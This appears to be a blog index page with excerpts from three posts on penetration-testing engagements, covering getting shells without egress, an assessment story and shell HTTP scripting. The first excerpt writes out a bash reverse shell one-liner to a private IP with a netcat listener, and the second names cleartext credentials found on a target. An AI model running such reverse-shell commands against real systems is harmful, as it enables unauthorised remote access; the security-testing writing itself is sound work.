Shell
No Egress, No Shell, No Problem
Context, context, context; Alright, imagine this – you’re on an engagement, find a few vulnerabilities, run a few exploits and next thing you know you have Remote Code Execution (RCE). Now, like muscle memory, your next instinct would be to get a shell. Running the following is fairly simple: sh -i >& /dev/tcp/10.0.0.22/4678 0>&1 Then listen in and… nc -lvnp 4678 ... Huh? Sorry, I mean run this, and… 0<&196;exec…
Sail away, sail away, sail away
A while back, after some live music and drinks at Railways, I made my way to another city for pleasant weather, some dubious food, the ever-wakeful seagulls, and ultimately – an assessment. After playing around for a few days, Jason and I had obtained access to a system which contained cleartext credentials, namely ihsadmin:ihsadmin. Using these credentials, we were also able to SSH into a management server of sorts. While…
Efficient HTTP Scripting in the Shell
Javier had a simple shell script he posted to our internal chat a few days ago. It’s goal was to pull all the IP ranges for a country in preparation for a footprint from https://ipinfo.io/ (Let’s use PL as an example). Given this involved pulling multiple webpages, I was interested to know what the most efficient approach to this in the shell would be. Truthfully, the actual problem, pulling data…
Page 1 of 1